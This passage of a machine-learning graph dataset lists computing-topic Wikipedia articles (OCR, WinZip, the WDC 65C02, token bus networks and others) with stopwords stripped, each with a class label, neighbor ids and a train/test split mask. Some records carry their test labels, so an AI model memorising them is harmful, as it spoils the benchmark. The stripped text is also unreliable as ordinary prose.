98 released mid-1990s quarterdeck tried recast internet company releasing version mosaic web browser eventually company acquired symantec byte 1984 stated desq application compatibility highest five window managers tested magazine 1989 listed version 3.0 among distinction winners byte awards stating unlike os/2 desqview lets run programs 've already paid … many users find desqview need",
    "neighbors": [
      2179,
      10757,
      6797,
      8851,
      2201,
      2345,
      7983,
      8241,
      178,
      2355,
      9525,
      5823,
      6730,
      2380,
      5080,
      4441,
      1247,
      9569,
      8301,
      5492,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5857,
    "label": 0,
    "text": "Optical_character_recognition:optical character recognition optical character recognition optical character reader ocr mechanical electronic conversion images typed handwritten printed text machine-encoded text whether scanned document photo document scene-photo example text signs billboards landscape photo subtitle text superimposed image example television broadcast widely used form information entry printed paper data records – whether passport documents invoices bank statements computerized receipts business cards mail printouts static-data suitable documentation – common method digitizing printed texts electronically edited searched stored compactly displayed on-line used machine processes cognitive computing machine translation extracted text-to-speech key data text mining ocr field research pattern recognition artificial intelligence computer vision early versions needed trained images character worked one font time advanced systems capable producing high degree recognition accuracy fonts common support variety digital image file format inputs systems capable reproducing formatted output closely approximates original page including images columns non-textual components early optical character recognition may traced technologies involving telegraphy creating reading devices blind 1914 emanuel goldberg developed machine read characters converted standard telegraph code concurrently edmund fournier d'albe developed optophone handheld scanner moved across printed page produced tones corresponded specific letters characters late 1920s 1930s emanuel goldberg developed called statistical machine searching microfilm archives using optical code recognition system 1931 granted usa patent number 1,838,389 invention patent acquired ibm advent smart-phones smartglasses ocr used internet connected mobile device applications extract text captured using device camera devices ocr functionality built operating system typically use ocr api extract text image file captured provided device ocr api returns extracted text along information location detected text original image back device app processing text-to-speech display 1974 ray kurzweil started company kurzweil computer products inc. continued development omni-font ocr could recognize text printed virtually font kurzweil often credited inventing omni-font ocr use companies including compuscan late 1960s 1970s kurzweil decided best application technology would create reading machine blind would allow blind people computer read text loud device required invention two enabling technologiesthe ccd flatbed scanner text-to-speech synthesizer january 13 1976 successful finished product unveiled widely reported news conference headed kurzweil leaders national federation blind 1978 kurzweil computer products began selling commercial version optical character recognition computer program lexisnexis one first customers bought program upload legal paper news documents onto nascent online databases two years later kurzweil sold company xerox interest commercializing paper-to-computer text conversion xerox eventually spun scansoft merged nuance communications research group headed a. g. ramakrishnan medical intelligence language engineering lab indian institute science developed printtobraille tool open source gui front end used ocr convert scanned images printed books braille books 2000s ocr made available online service webocr cloud computing environment mobile applications like real-time translation foreign-language signs smartphone various commercial open source ocr systems available common writing systems including latin cyrillic arabic hebrew indic bengali bangla devanagari tamil chinese japanese korean characters ocr engines developed many kinds domain-specific ocr applications receipt ocr invoice ocr check ocr legal billing document ocr used ocr generally offline process analyses static document handwriting movement analysis used input handwriting recognition instead merely using shapes glyphs words technique able capture motions order segments drawn direction pattern putting pen lifting additional information make end-to-end process accurate technology also known on-line character recognition dynamic character recognition real-time character recognition intelligent character recognition ocr software often pre-processes images improve chances successful recognition techniques include segmentation fixed-pitch fonts accomplished relatively simply aligning image uniform grid based vertical grid lines least often intersect black areas proportional fonts sophisticated techniques needed whitespace letters sometimes greater words vertical lines intersect one character two basic types core ocr algorithm may produce ranked list candidate characters matrix matching involves comparing image stored glyph pixel-by-pixel basis also known pattern matching pattern recognition image correlation relies input glyph correctly isolated rest image stored glyph similar font scale technique works best typewritten text work well new fonts encountered technique early physical photocell-based ocr implemented rather directly feature extraction decomposes glyphs features like lines closed loops line direction line intersections extraction features reduces dimensionality representation makes recognition process computationally efficient features compared abstract vector-like representation character might reduce one glyph prototypes general techniques feature detection computer vision applicable type ocr commonly seen intelligent handwriting recognition indeed modern ocr software nearest neighbour classifiers k-nearest neighbors algorithm used compare image features stored glyph features choose nearest match software cuneiform tesseract use two-pass approach character recognition second pass known adaptive recognition uses letter shapes recognized high confidence first pass recognize better remaining letters second pass advantageous unusual fonts low-quality scans font distorted e.g blurred faded ocr result stored standardized alto format dedicated xml schema maintained united states library congress list optical character recognition software see comparison optical character recognition software ocr accuracy increased output constrained lexicona list words allowed occur document might example words english language technical lexicon specific field technique problematic document contains words lexicon like proper nouns tesseract uses dictionary influence character segmentation step improved accuracy output stream may plain text stream file characters sophisticated ocr systems preserve original layout page produce example annotated pdf includes original image page searchable textual representation near-neighbor analysis make use co-occurrence frequencies correct errors noting certain words often seen together example washington d.c. generally far common english washington doc knowledge grammar language scanned also help determine word likely verb noun example allowing greater accuracy levenshtein distance algorithm also used ocr post-processing optimize results ocr api recent years major ocr technology providers began tweak ocr systems deal efficiently specific types input beyond application-specific lexicon better performance may taking account business rules standard expression rich information contained color images strategy called application-oriented ocr customized ocr applied ocr license plates invoices screenshots id cards driver licenses automobile manufacturing new york times adapted ocr technology proprietary tool entitle document helper enables interactive news team accelerate processing documents need reviewed note enables process amounts many 5,400 pages per hour preparation reporters review contents several techniques solving problem character recognition means improved ocr algorithms special fonts like ocr-a ocr-b micr fonts precisely specified sizing spacing distinctive character shapes allow higher accuracy rate transcription bank check processing ironically however several prominent ocr engines designed capture text popular fonts arial times new roman incapable capturing text fonts specialized much different popularly used fonts google tesseract trained recognize new fonts recognize ocr-a ocr-b micr fonts comb fields pre-printed boxes encourage humans write legiblyone glyph per box often printed dropout color easily removed ocr system palm os used special set glyphs known graffiti similar printed english characters simplified modified easier recognition platform computationally limited hardware users would need learn write special glyphs zone-based ocr restricts image specific part document often referred template ocr crowdsourcing humans perform character recognition quickly process images like computer-driven ocr higher accuracy recognizing images obtained computers practical systems include amazon mechanical turk recaptcha national library finland developed online interface users correct ocred texts standardized alto format crowd sourcing also used perform character recognition directly invite software developers develop image processing algorithms example use rank-order tournaments commissioned u.s. department energy doe information science research institute isri mission foster improvement automated technologies understanding machine printed documents conducted authoritative annual test ocr accuracy 1992 1996 recognition latin-script typewritten text still 100 accurate even clear imaging available one study based recognition 19th- early 20th-century newspaper pages concluded character-by-character ocr accuracy commercial ocr software varied 81 99 total accuracy achieved human review data dictionary authentication areas—including recognition hand printing cursive handwriting printed text scripts especially east asian language characters many strokes single character —are still subject active research mnist database commonly used testing systems ability recognise handwritten digits accuracy rates measured several ways measured greatly affect reported accuracy rate example word context basically lexicon words used correct software finding non-existent words character error rate 1 99 accuracy may result error rate 5 95 accuracy worse measurement based whether whole word recognized incorrect letters example difficulties inherent digitizing old text inability ocr differentiate long f characters web-based ocr systems recognizing hand-printed text fly become well known commercial products recent years see tablet pc history accuracy rates 80 90 neat clean hand-printed characters achieved pen computing software accuracy rate still translates dozens errors per page making technology useful limited applications recognition cursive text active area research recognition rates even lower hand-printed text higher rates recognition general cursive script likely possible without use contextual grammatical information example recognizing entire words dictionary easier trying parse individual characters script reading amount line cheque always written-out number example using smaller dictionary increase recognition rates greatly shapes individual cursive characters simply contain enough information accurately greater 98 recognize handwritten cursive script programs allow users set confidence rates means software achieve desired level accuracy user notified manual review characters support ocr added unicode standard june 1993 release version 1.1 characters mapped fonts specific micr ocr-a ocr-b",
    "neighbors": [
      5122,
      519,
      2440,
      651,
      2059,
      10508,
      6798,
      11538,
      1044,
      10645,
      5399,
      4632,
      538,
      7834,
      10650,
      7069,
      10794,
      8747,
      5550,
      7599,
      7857,
      4531,
      8627,
      3126,
      3127,
      2488,
      4662,
      1083,
      4541,
      10557,
      6975,
      6208,
      9539,
      8389,
      5450,
      3533,
      5197,
      6223,
      10319,
      7548,
      8538,
      8283,
      6111,
      8927,
      1890,
      4194,
      7780,
      6885,
      7909,
      8296,
      1001,
      7918,
      8046,
      8688,
      10867,
      7414,
      10231,
      8440,
      4474,
      3323,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 5858,
    "label": 6,
    "text": "WinZip:winzip winzip trialware file archiver compressor windows macos ios android developed winzip computing formerly nico mak computing create archives zip file format unpack archive file formats winzip 1.0 released april 1991 graphical user interface gui front-end pkzip earlier january 1991 nico mak computing released gui front-end os/2 presentation manager called pmzip used os/2 versions pkware inc. pkzip pkunzip programs originally released compuserve availability winzip expanded across major online services including genie prodigy online services 1993 winzip announced launch official support customers windows utility forum serving 100,000 members providing updates related information freely downloadable winzip soon found included best-selling windows computing titles part companion disks including all-time best-selling windows 3.0 book windows secrets brian livingston 1994 winzip become official required compression tool used system operators compuserve forum file libraries starting version 5.0 1993 creators winzip incorporated compression code info-zip project thus eliminating need pkzip executable present version 6.0 version 9.0 registered users could download newest versions software enter original registration information install top existing registered version thereby obtain free upgrade upgrade scheme discontinued version 10.0 winzip available standard professional versions however shell windows later versions microsoft windows ability open create .zip files titled compressed folders reduces need extra compression software may 2 2006 corel corporation best known wordperfect coreldraw product lines announced completed acquisition winzip computing vector capital winzip 1.0 mac os x released november 2010 version compatible mac os x 10.6 snow leopard intel-based v10.5 leopard macs winzip mac edition 2 includes support os x 10.8 mountain lion zip file archive format zip originally invented ms-dos 1989 phil katz seeing need archive application graphical user interface nico mak employed mansfield software group inc developed winzip application microsoft windows winzip 1.0 initial version windows winzip 2.0 added support arc files support self-extracting zip files zip2exe optional interface virus scan software dialog box specify paths filenames external programs winzip 3.0 added full support lzh files including self-extracting lzh files configurable support virus scanners simplified options add extract files subdirectory tree winzip 3.1 added support windows 3.1 drag drop interface enhanced extract dialog box common dialog directory drive list test action zip lzh files added file types zip lzh arc new open dialog boxes winzip 3.2 added built-in zip extraction pkunzip needed zip extract operations winzip always uses pkzip.exe modify zip files winzip 4.0 added support pkzip 2.0 including built-in zip extraction support arj file format new toolbar descriptive pictorial buttons added 3-d look dialog boxes winzip 5.0 added pkzip-compatible built-in zipping pkzip needed basic archive management note two advanced features disk-spanning encryption still require pkzip added support windows-based virus scanners added built-in actions/test operation zip files built-in unzipping used running dos virus scanners added support international characters archive names files archives winzip 5.5 added ability install try uninstall software packed zip files winzip 5.6 added compression support popular internet file formats tar gzip unix winzip 6.0 added many windows 95-specific features including tight integration windows 95 shell explorer-style dialog boxes enhancements included improved interface file viewers express setup option better support virus scanners winzip 6.0a features improved windows 95 drag drop support winzip 7.0 introduced microsoft cab cabinet format internet explorer 4.0-style one click open interface zip comments registry-based configuration arj 2.60 long file name support explorer-style fonts winzip self-extractor personal edition creates zip files span multiple removable disks winzip 8.0 wizard interface extended allow users create update zip files wizard ability extract install mime encoded files automatic installation desktop themes screensavers addition explorer context menu opening files within archives inclusion subfolders adding updating archives explorer-style toolbar buttons displaying tooltip zip file selected windows explorer winzip context menus displays small icons correspond toolbar buttons windows 98 windows 2000 ability install desktop themes screensavers contained zip files new 'zip e-mail context menu commands automatic display zip comments context menu help winzip dialogs viewing multiple files one action windows extensions 32-bit explorer shell extensions winzip self-extractor personal edition longer supports creation 16-bit self-extracted archive winzip 8.1 last major release officially support windows 95 included ability extract multiple zip archives explorer configurable explorer context menus creation split zip archives new 'quick pick system tray icon resizable dialog boxes windows 98 higher extraction files split spanned zip archives wizard interface windows xp theme support opening skin files microsoft media player 7 .wmz yahoo player .yfs winamp .wsz displaying file comments 64,000 characters support filenames containing multi-byte character set mbcs characters increasing number entries created 'checkout feature programs menu 500 winzip 9.0 added support aes encryption zip archives bzip2-compressed zip archives extraction also removed previous limitations 65,535 files per zip file maximum file size 4 gigabytes version released 2004 winzip 10 added support creating extracting ppmd-compressed zip archives last major release officially support windows 98/me winzip pro added release added automation task scheduling features version released 2005 winzip 11 added support creating extracting wavpack-compressed zip archives installer still installed windows 98/me operating systems longer officially supported winzip pro added passive ftp support ftp transfers e-mail notification option job wizard custom jobs selection full-size image viewer opening archive version released 2006 winzip 11.1 certified windows vista vista theme support 64-bit windows support winzip 11.2 could create lha archives without external utility unicode file name support zip archives also added support external archivers arc arj removed winzip 12.0 2008 added support creating zip archives lossless jpeg lzma compression methods .iso .img 7-zip archive extractions added encryption policies integrated image thumbnail viewer jpeg compression compresses metadata lzma compression image compressed binary arithmetic coding winzip 12.1 2009 introduces new default .zipx file extension creating zip archives using methods newer deflate64 added automatic resizing images sent using zip e-mail functions winzip 13 skipped winzip 14 2009 added windows 7 support library grouping taskbar icon jump lists explorer preview multi-touch two finger gestures winzip 14 backup edition added supports automatic backup feature aes new instructions used supported speed aes encryption winzip 14.5 april 2010 added microsoft office 2010-style ribbon interface support windows 7 libraries jump lists multi-touch gestures interface functionality improvements winzip 15 november 2010 december 1 2010 implemented new performance architecture high-speed zipping interface improvements refined menu designs intuitive icons new desktop zip/unzip gadget drag-and-drop functionality new extensive email/webmail support backup function pro version due bug first release version creating backup jobs *.wjf job file selection needs reset/set working properly winzip 15.5 april 2011 new compression algorithms designed multi-processor systems zip files twice fast new winzip desktop gadget option called 'folder choose allows create select target folder zipping/unzipping files case-by-case basis dynamic context-sensitive icons automatically change reflect winzip tasks available specific situation streamlined processes remove unnecessary dialogs cut extra steps ability show/hide address bar ability instantly jump instances winzip currently open ability customize look feel winzip interface interchangeable themes improved destination folder management open/alter zipped file contents directly email attachment winzip prompt save work new location computer rather email temp folder streamlined 'unzip try processes remove extra steps making temporary viewing even quicker easier extended enterprise support provides control addition/alteration e-mail services winzip 16.0 released october 25 2011 implemented new 64-bit zip engine added 64-bit version winzip added ability zip write files blu-ray discs added integration zipsend zipshare services improved capabilities file conversion supported formats zip enhanced preview tools browsing editing contents compressed file types added system scanner diagnostic tool scans possible performance issues zipsend zipsend pro send message 50mb 2gb zipped data per message zipshare post files 20 mb data directly facebook free 100mb total data per account winzip 16.5 supports opencl acceleration file compression engine amd fusion processors amd radeon users streamlined interface winzip 17.0 released october 16 2012 introduced online sharing storage social media sites image resizing converting files pdf watermark addition context-sensitive toolbars winzip 17.5 released may 9 2013 new features include sharing features permission controls updated modernized user interface watermark timestamping four times faster .zip archive extraction maximum 23gb free cloud storage via box dropbox google drive skydrive cloudme new winzip 18.0 released october 31 2013 new features include support xz lzma2 compression additional features winzip express cloud backup winzip 18.5 released may 12 2014 includes support zipshare send zip files instant messaging facebook google talk/google+ hangouts yahoo messenger jabber cloud sharing includes mediafire integration winzip 19 released october 28 2014 includes unified local network cloud file management modern ui touch support adds enterprise edition corporate government use added fips 140-2 encryption enterprise edition also open extract vhd files winzip 19.5 released may 7 2015 adds smartshare share via clipboard cloud links view thumbnails auto-hide scroll bars slide-in action pane enterprise adds vmware file support vhd files ntfs compression winzip 20.0 released october 20 2015 new features include extract vhd vmdk virtual disks expanded sharing youtube instant message support scan share snap share improved file management winzip 21.0 released october 25 2016 new features include 16 accounts per cloud service domain access enhanced mp3 compression preview pane image information combined address book dis-aggregation individual zip file creation send inline conversion winzip 1.0 mac os x november 16 2010 initial release compatible intel macs run v10.5 'leopard winzip mac edition 2 released june 26 2012 new features include os x 10.8 mountain lion support finder integration in-place editing ios version first released february 17 2012 free english app designed ios 4.2 iphone ipad ipod touch available apple app store version 1.1.1 may 4 2012 includes following winzip android first released june 19 2012 free english app designed android operating system versions 2.1 eclair 2.2 froyo 2.3 gingerbread 3.x honeycomb 4.x ice cream sandwich higher initially available google play new version 1.1.0 winzip e-mail companion version 2.0 supports microsoft outlook 2002 2003 2007 windows mail 6.0 outlook express 6.0 optionally supports microsoft word microsoft powerpoint microsoft excel versions 2007 2003 2002 unlisted support outlook 2010 works 32-bit versions outlook 2010 winzip system utilities released february 14 2011 includes winzip driver updater 1.0 winzip registry optimizer 2.0",
    "neighbors": [
      3586,
      6022,
      10121,
      1420,
      1299,
      1940,
      3222,
      9880,
      3114,
      10027,
      3629,
      7983,
      950,
      6713,
      2755,
      11076,
      9541,
      1352,
      4296,
      10317,
      9166,
      10575,
      4561,
      722,
      10839,
      8413,
      5726,
      1631,
      3296,
      9953,
      11614,
      6759,
      9063,
      5225,
      7529,
      4331,
      4459,
      237,
      1646,
      10476,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "None"
  },
  {
    "node_id": 5859,
    "label": 3,
    "text": "Socket_FM1:socket fm1 socket fm1 cpu socket desktop computers used llano processors llano-derived athlon ii processors released july 2011 direct successors socket fm2 september 2012 socket fm2+ january 2014 socket am1 january 2014 targeting low-power socs available chipsets consult fusion controller hubs fch apu using socket fm1 amd platform please consult list amd accelerated processing units concrete product denominations",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      7058,
      10260,
      4246,
      2719,
      2463,
      4767,
      2850,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      9057,
      4451,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 5860,
    "label": 4,
    "text": "Novell_BorderManager:novell bordermanager bordermanager multi purpose network security application developed novell inc. bordermanager designed proxy server firewall vpn access point novell announced migration superlumin 4.0 proxy cache novell preferred firewall proxy solution netware customers upgrading novell open enterprise server linux bordermanager designed run top netware kernel takes advantage fast file services netware kernel delivers aside easily copied firewall vpn access point services novell designed proxy services retrieve web data server server connection rather client server connection prior proxy servers market done retrieval method along netware fast file io proprietary code made bordermanager proxy engine one fastest existence 2003 novell announced successor product netware open enterprise server oes first released march 2005 oes completes separation services traditionally associated netware i.e file print makes possible customer choose netware linux kernel services run time novell announced end development netware kernel numerous public private statements 64-bit future netware linux path 64-bit computing oes follow migration path novell began porting applications linux company began looking alternate ways deliver services firewall vpn access point services equivalent functionality readily available free/open-source community also basic proxy services well i.e squid desire deliver functional equivalent could done full software code port much cache engine sold part volera excelerator novell holds great desire use create open-source software basic services novell entered agreement astaro relabel astaro security gateway license novell security manager product removed novell price list 15 february 2007 late summer 2006 novell announced would bordermanager 3.9 release novell brainshare conference 2010 novell announced superlumin 4.0 proxy cache path forward bordermanager customers also announced extended bordermanager general support two years march 7 2012 give customers adequate time make move november 2011 novell support lifecycle page states border manager 3.9 general support extended september 30 2013 make easy customers plan execute upgrade novell open enterprise server upgrade path border manager remains superlumin nemesis third-party filtering solutions available novell bordermanager following companies",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      939,
      1708,
      3243,
      3885,
      8753,
      10804,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      11513,
      2118,
      4814,
      3791,
      9423,
      7121,
      10574,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      9817,
      6625,
      3942,
      10987,
      8943,
      8816,
      1522,
      5490,
      9971,
      4725,
      5749,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 5861,
    "label": 3,
    "text": "Xputer:xputer xputer design reconfigurable computer proposed computer scientist reiner hartenstein hartenstein uses various terms describe various innovations design including config-ware flow-ware morph-ware anti-machine xputer represents move away traditional von neumann computer architecture coarse-grained soft arithmetic logic unit alu architecture parallelism achieved configurable elements known reconfigurable datapath arrays rdpa organized two-dimensional array alu similar kressarray xputer architecture data-stream-based counterpart instruction-based von neumann computer architecture xputer architecture one first coarse-grained reconfigurable architectures consists reconfigurable datapath array rdpa organized two-dimensional array alus rdpu bus-width alu 32-bit first version xputer alus also known rdpus used computing single mathematical operation addition subtraction multiplication also used purely routing alus mesh-connected via three types connections data-flow along connections managed address generation unit programs xputer written c language compiled usage xputer using codex compiler written author codex compiler maps suitable portions c program onto xputer rdpa fabric remainder program executed host system personal computer reconfigurable datapath array rdpa semiconductor device containing reconfigurable data path units programmable interconnects first proposed rainer kress 1993 university kaiserslautern instead fpgas field-programmable gate arrays single bit configurable logic blocks clbs rdpas multiple bits wide instance 32 bit path width reconfigurable datapath units rdpus rdpu configured perform individual function rdpus interconnects programmed manufacturing process customer/designer hence term reconfigurable rdpa perform whatever complex computation needed rdpus multiple bits wide instance 32 bits talk coarse-grained reconfigurability contrast fpgas single-bit wide configurable logic blocks called fine-gained reconfigurable rdpas structurally programmed config-ware source code compiled pipe-networks mapped onto rdpa rdpas instruction-stream-driven instruction fetch run time rdpus program counter",
    "neighbors": [
      4773,
      6950,
      11333,
      5355,
      3886,
      2224,
      4465,
      3762,
      11125,
      8508,
      3159,
      9371,
      6716,
      2045,
      11487
    ],
    "mask": "Train"
  },
  {
    "node_id": 5862,
    "label": 3,
    "text": "WDC_65C02:wdc 65c02 western design center wdc 65c02 microprocessor enhanced cmos version popular nmos-based 8-bit mos technology 6502 65c02 fixed several problems original 6502 added small number new commands however main feature greatly lowered power usage order 10 times less 6502 running speed made useful portable computer roles microcontroller systems industrial settings used home computers well embedded applications including medical-grade implanted devices development began 1981 known 65802 first sample versions released early 1983 wdc licenced design synertek ncr gte rockwell semiconductor rockwell primary interest embedded market asked several new commands added aid role later copied back baseline version point wdc added two new commands create w65c02 sanyo later licenced design well seiko epson produced modified version huc6280 early versions used 40-pin dip packaging available 1 2 4 mhz versions later versions produced plcc qfp increasing speed well latest version wdc w65c02s-14 runs speeds 14 mhz 65c02 low cost general-purpose 8-bit microprocessor 8-bit registers data bus 16-bit program counter address bus register set small single 8-bit accumulator two 8-bit index registers x 8-bit status register p 16-bit program counter pc addition single accumulator first 256 bytes ram zero page 0000 00ff allow faster access dedicated addressing mode requires single byte address instead two stack lies next 256 bytes page one 0100 01ff moved extended stack grows downwards stack pointer starting 01ff decrementing stack grows variable-length instruction set varying one three bytes per instruction basic architecture 65c02 identical original 6502 considered low-power implementation design 1 mhz popular speed original 6502 65c02 requires 20 mw original uses 450 mw reduction twenty times manually optimized core low power use intended make 65c02 well suited low power system-on-chip soc designs verilog hardware description model available designing w65c02s core application-specific integrated circuit asic field-programmable gate array fpga common semiconductor industry wdc offers development system includes developer board in-circuit emulator ice software development system w65c02s–14 production version available pdip plcc qfp packages maximum officially supported ϕ2 primary clock speed 14 mhz indicated –14 part number suffix designation indicates part fully static core feature allows ϕ2 slowed fully stopped either high low state loss data typical microprocessors implemented cmos dynamic cores lose internal register contents thus crash continuously clocked rate minimum maximum specified values w65c02s may operated convenient supply voltage v 1.8 5 volts ±5 data sheet ac characteristics table lists operational characteristics 5 v 14 mhz 3.3 v 3 v 8 mhz 2.5 v 4 mhz 1.8 v 2 mhz information may artifact earlier data sheet graph indicates typical devices capable operation higher speeds suggested ac characteristics table reliable operation 20 mhz readily attainable v 5 volts assuming supporting hardware allow w65c02s may also operated non-integral clock rates 13.5 mhz digital sdtv luma sampling rate 14.31818 mhz ntsc colour carrier frequency × 4 14.75 mhz pal square pixels 14.7456 baud rate crystal etc. long v sufficient support frequency designer bill mensch pointed f affected off-chip factors capacitive load microprocessor pins minimizing load using short signal tracks fewest devices helps raise f. plcc qfp packages less pin-to-pin capacitance pdip package economical use printed circuit board space wdc reported fpga realizations w65c02s successfully operated 200 mhz although 65c02 mostly thought low-power 6502 also fixes several bugs found original adds new opcodes help increase code density estimated average 6502 assembly program made 10 15 smaller 65c02 see similar improvement performance avoided memory accesses original 6502 56 instructions combined different addressing modes produced total 151 opcodes possible 256 8-bit patterns remaining 105 unused opcodes undefined set codes low-order 4-bits 3 7 b f left entirely unused 2 single opcode 6502 famous way leftover codes actually performed actions due way 6502 instruction decoder worked simply setting certain bits opcode would cause parts instruction processing take place opcodes would immediately crash processor performed useful functions even given unofficial assembler mnemonics users 65c02 added number new opcodes used number previously undocumented instruction slots instance ff used new codice_5 instruction see remained truly unused set perform codice_6s programs took advantage codes work 65c02 codes always documented non-operational used original 6502 several bugs initially launched among notorious codice_7 rotate right broken due problem chip mos addressed documenting instruction bug fixed early production run generally issue vast majority machines using processor contrast another bug remained design lifetime involved commonly-used jump command codice_8 using indirect addressing mode address jmp looked another memory location instance codice_9 would fetch value bytes 1234 1235 use 16 bits actual memory location jump however initial address ended ff boundary memory page jmp took significant byte 16-bit address 00 original page rather 00 new page instance codice_10 would get first byte 12ff second incorrectly 1200 rather 1300 fixed 65c02 another bug original 6502 concerned behaviour ecimal flag status register left undefined reset interrupt meant programmers forced set flag known value one finds codice_11 instruction clear decimal following initial codice_12 almost interrupt handlers 65c02 automatically set reset flag correctly pushing status register onto stack related problem occurred operating decimal mode n egative v erflow z ero flags updated properly ways address code cost additional instructions 65c02 addresses problem sets flags correctly cost single clock cycle 6502 included variation indirect addressing mode based x index registers instruction used mode processor took initial zero page address added x register returned value resulting location unfortunately way load data zero page one wanted access single byte known location page code first codice_13 codice_14 65c02 added new mode codice_15 removing need ldy 6502 also included mode known preindexing offset address value x register fetched data address pointed 16-bit data instance x register holds value 4 codice_16 would add value x absolute addresses 12 pick two bytes 16 17 value two bytes 1234 fetches 8-bit value memory location 1234 basic idea allow set series unrelated locations memory access changing x register useful could used zero page data intermediate address 65c02 extended new postindexed version officially known indexed absolute indirect available register mode fetched address zero page added value retrieving 16-bits zero page instance codice_17 would first look address 12/ 13 retrieve instance 1230 add loading accumulator value 1234 new mode extremely useful implementing jump tables set subroutines previously locations would zero page list could placed anywhere main memory starting location list placed zero page program codice_18 call routine number 10 sort access pattern extremely common notably widely used basic programming language found many 6502 systems sort access possible original preindexing version cost entire table zero page limited resource new mode particularly useful routines rom addition new addressing modes base model 65c02 also added set new instructions initial design 65c02 modified rockwell interested 6502 basis embedded processors roles common device drivers communicate cpu encoding status bits single byte fashion similar cpu status register makes various bit manipulation instructions common embedded applications normally one tests bits codice_44ing desired pattern memory location holding data branching based status register z ero flag instance address 1234 status register device bit 3 held ready status one could implement continue ready codice_45 hex 08 third bit bit set equal branch routine 2345 sort test common original 6502 included special-purpose codice_46 instruction automating bit change accumulator unlike anding tested bits 6 7 time placing results n egative v erflow flags long device drivers used bits 6 7 commonly tested flags using bit could reduce number tests needed 65c02 improved bit command adding new addressing modes including ability test constant accumulator instead pattern initially stored memory however rockwell changes went far beyond changes bit adding host commands directly setting testing bit combining test clear branch single opcode new instructions available start rockwell r65c00 family part original 65c02 specification found versions made wdc licensees later copied back baseline design available later wdc versions denoted leading w w65c02 new instructions include addition new commands wdc also added codice_4 codice_3 instructions supporting low-power modes stp stop processor halted processing hardware reset issued could used put system sleep rapidly wake reset however required external system maintain memory widely used wait similar effect entering low-power mode time woke reception interrupt embedded uses meant device driver poll changes instead simply issued wai jumped interrupt processing started added advantage always entering low-power mode instructions completed handler always started one cycle instead wait currently processing instructions complete first 65sc02 variant wdc 65c02 without bit instructions",
    "neighbors": [
      11395,
      1029,
      3722,
      8715,
      9739,
      10767,
      664,
      5529,
      7323,
      8352,
      4385,
      10784,
      10786,
      6821,
      7589,
      3630,
      3886,
      5040,
      11054,
      9911,
      2874,
      5823,
      8767,
      3010,
      5457,
      3157,
      6485,
      10969,
      10351,
      1776,
      4465,
      5617,
      7281,
      372,
      7282,
      7284,
      11125
    ],
    "mask": "None"
  },
  {
    "node_id": 5863,
    "label": 5,
    "text": "Token_bus_network:token bus network token bus network implementing token ring protocol virtual ring coaxial cable token passed around network nodes node possessing token may transmit node n't anything send token passed next node virtual ring node must know address neighbour ring special protocol needed notify nodes connections disconnections ring due difficulties handling device failures adding new stations network token ring gained reputation unreliable difficult upgrade bus networks ethernet flexible reliable physical architecture ethernet access protocol could absolutely guarantee maximum time station would wait access network thought unsuitable manufacturing automation applications token bus protocol created combine benefits physical bus network deterministic access protocol token ring network token bus standardized ieee standard 802.4 mainly used industrial applications token bus used general motors manufacturing automation protocol map standardization effort application concepts used token ring networks main difference endpoints bus meet form physical ring order guarantee packet delay transmission token bus protocol modified token bus proposed manufacturing automation systems flexible manufacturing system fms means carrying internet protocol ieee 802 networks including token bus networks developed ieee 802.4 working group disbanded standard withdrawn ieee",
    "neighbors": [
      10112,
      2306,
      388,
      7045,
      8708,
      3847,
      7049,
      5270,
      11288,
      2458,
      5020,
      5671,
      1192,
      11560,
      6187,
      4396,
      7723,
      11181,
      434,
      3762,
      11321,
      5439,
      7490,
      3780,
      9284,
      5321,
      7498,
      2904,
      10332,
      2911,
      5472,
      2785,
      5092,
      4581,
      2802,
      11125,
      6904,
      8828,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 5864,
    "label": 2,
    "text": "Open_Transport:open transport open transport name given apple inc. implementation unix-originated system v streams networking stack based code licensed mentat portable streams product open transport built provide classic mac os modern tcp/ip implementation replacing mactcp apple also added implementation appletalk stack support legacy networks prior release open transport classic mac os used variety stand-alone inits provide networking functionality one widely used throughout os appletalk system among protocol stacks supported mactcp becoming increasingly important internet boom started gain momentum mactcp emulated berkeley sockets system widely used among unix-like operating systems mactcp previous generation appletalk library slow powerpc-based macintoshes written previous generation 680x0-based macintoshes therefore ran emulation powerpc-based machines mactcp also lacking features however major upgrade clearly needed apple keep hand internet market late 1980s several major efforts re-combine many unix derivatives single system underway significant among t-led system v. system v included entirely new networking stack streams replacing existing berkeley sockets system streams number advantages sockets including ability support multiple networking stacks time ability plug modules middle existing stacks provide simple mechanisms filtering similar duties offering single application programming interface user programs time appeared streams would become de facto standard change market led apple move support streams well also presented two practical advantages company streams multiprotocol support would allow support tcp/ip appletalk single interface portable cross-platform version streams available purchase commercially one included high-quality tcp implementation using streams also appeared offer way one microsoft whose tcp/ip networking system winsock based apparently soon-to-be-obsolete sockets open transport introduced may 1995 power mac 9500 included system 7.5.2 release new pci based power macs became available older hardware later mactcp supported pci-based macs older systems could switch mactcp open transport using control panel called network software selector unlike mactcp open transport allowed users save switch configuration sets developer opinion open transport divided felt offered enormous speed improvements mactcp developers also liked flexible way allowed protocols stacked apply filters duties however system also large complex flexibility open transport architecture one could plug desired protocol felt thoroughly overcomplicated additionally unix code still used sockets streams mactcp offered real advantages terms porting software mac vaunted flexibility open transport architecture undermined ultimately made obsolete rapid rise tcp/ip networking mid-90s true wider unix market system v undermined rapid rise free unix-like systems notably linux systems grew popularity vast majority programmers ignored closed streams favour bsd-licensed sockets open transport abandoned move os x derived bsd networking stack based entirely sockets open transport received deprecation status starting mac os x 